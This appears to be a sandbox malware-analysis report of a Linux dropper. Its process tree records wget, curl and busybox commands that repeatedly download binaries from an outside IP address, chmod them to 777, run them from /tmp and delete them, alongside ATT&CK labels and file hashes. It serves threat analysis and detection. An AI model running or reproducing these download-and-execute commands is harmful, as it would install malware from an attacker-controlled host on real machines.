/usr/bin/wgetwget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:933
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:939
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:945
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:952
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:958
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:964
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Reads runtime system information
PID:969
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97